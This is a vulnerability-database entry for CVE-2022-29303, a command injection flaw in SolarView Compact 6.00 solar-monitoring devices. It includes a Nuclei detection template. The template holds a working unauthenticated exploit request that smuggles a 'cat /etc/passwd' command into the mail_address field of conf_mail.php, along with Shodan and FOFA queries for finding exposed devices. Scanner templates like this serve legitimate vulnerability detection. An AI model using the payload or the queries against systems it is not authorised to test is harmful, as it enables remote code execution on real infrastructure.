Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-29303
HistoryMay 18, 2022 - 10:39 a.m.

SolarView Compact 6.00 - OS Command Injection

2022-05-1810:39:07
ProjectDiscovery
github.com
26

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.966 High

EPSS

Percentile

99.6%

SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
id: CVE-2022-29303

info:
  name: SolarView Compact 6.00 - OS Command Injection
  author: badboycxcc
  severity: critical
  description: |
    SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.
  reference:
    - https://www.exploit-db.com/exploits/50940
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
    - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
    - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29303
    cwe-id: CWE-78
    epss-score: 0.96471
    epss-percentile: 0.99582
    cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contec
    product: sv-cpt-mc310_firmware
    shodan-query:
      - http.html:"SolarView Compact"
      - http.html:"solarview compact"
    fofa-query: body="solarview compact"
  tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec
variables:
  cmd: "cat${IFS}/etc/passwd"

http:
  - raw:
      - |
        @timeout: 25s
        POST /conf_mail.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0"

      - type: word
        part: body
        words:
          - "p1_network_mail.cgi"
# digest: 4b0a004830460221008011155dc28ea830777ce64e2c0d843768d4a4e12fac5398761e2f0c84901e30022100984d42b1d8414805f6b7daf854463255020e97ab016422dd9ebea656658a9e8c:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.966 High

EPSS

Percentile

99.6%